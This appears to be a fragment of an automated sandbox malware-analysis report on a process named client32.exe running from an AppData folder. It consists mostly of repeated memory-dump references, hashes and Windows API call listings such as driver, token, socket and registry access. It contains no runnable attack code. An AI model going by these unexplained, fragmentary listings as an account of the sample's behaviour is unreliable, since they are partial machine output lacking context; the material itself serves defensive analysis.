                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                    • API String ID: 2251294070-3916143138
                                                                                                                                                                                                    • Opcode ID: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                                                                                    • Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110151D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseCreateFileHandle
• String ID: \\.\NSWFPDrv
• API String ID: 3498533004-85019792
• Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
• Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
• Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
• Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1
APIs
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _calloc
• String ID:
• API String ID: 1679841372-0
• Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
• Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
• Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
• Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0
APIs
• _memset.LIBCMT ref: 68598FE4
• getsockname.WSOCK32(?,?,00000010,?,02D42E90,?), ref: 68599005
• WSAGetLastError.WSOCK32(?,?,00000010,?,02D42E90,?), ref: 6859902E
  • Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast_memsetgetsocknameinet_ntoa
• String ID:
• API String ID: 3066294524-0
• Opcode ID: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
• Instruction ID: b2f72d1da823fcf21a5055cfacb7210fa2dd74d042b233ef0eeefe23358ff26e
• Opcode Fuzzy Hash: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
• Instruction Fuzzy Hash: A4113076E00108AFCB40DFA9DC11AFFB7B8EF89214F41456AEC05E7240E770AE148B95
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 687E09E8
• _errno.MSVCR100(?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 6880F3D7
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: AllocateHeap_errno
• String ID:
• API String ID: 242259997-0
• Opcode ID: 1f89951594bd3b60cb572266809bb2abce226777585caa7d062bdc3e1feaa5e2
• Instruction ID: e4c67670417cf6b0033574537d7cbcb60238b043d770846b69ba147b02f5b43d
• Opcode Fuzzy Hash: 1f89951594bd3b60cb572266809bb2abce226777585caa7d062bdc3e1feaa5e2
• Instruction Fuzzy Hash: 790192312852169FFB049E2DDD48B6B3798BFA2760F418929B8259B1D0DBB0D440CBA0
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
• __wsplitpath.LIBCMT ref: 1110E405
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: DirectoryInformationSystemVolume__wsplitpath
• String ID:
• API String ID: 395646034-0
• Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
• Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
• Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
• Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65
APIs
• GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
• OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
  • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
  • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
  • Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,111EAB1C,?,00000001,00000001), ref: 1109DCA0
  • Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,007AF420,?,00000001,00000001), ref: 1109DCB3
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2256153495-0
                                                                                                                                                                                                    • Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC8B8,24DE4E77,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC8B8,24DE4E77,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3991485460-0
                                                                                                                                                                                                    • Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: ??CTL32.DLL
                                                                                                                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                                                                                                                    • Opcode ID: e5a1e62f84c08d1d43d23472a1a595ca18a9758f57363a42cce1bbd222405820
                                                                                                                                                                                                    • Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5a1e62f84c08d1d43d23472a1a595ca18a9758f57363a42cce1bbd222405820
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110267DD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: DriveType
• String ID: ?:\
• API String ID: 338552980-2533537817
• Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
• Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
• Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
• Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791
APIs
  • Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAE9D
• RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAEEC
  • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
Strings
• Error %d Opening regkey %s, xrefs: 110EAEFA
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseOpenwvsprintf
• String ID: Error %d Opening regkey %s
• API String ID: 1772833024-3994271378
• Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
• Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
• Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
• Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0
APIs
• _memset.LIBCMT ref: 1110C4D2
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
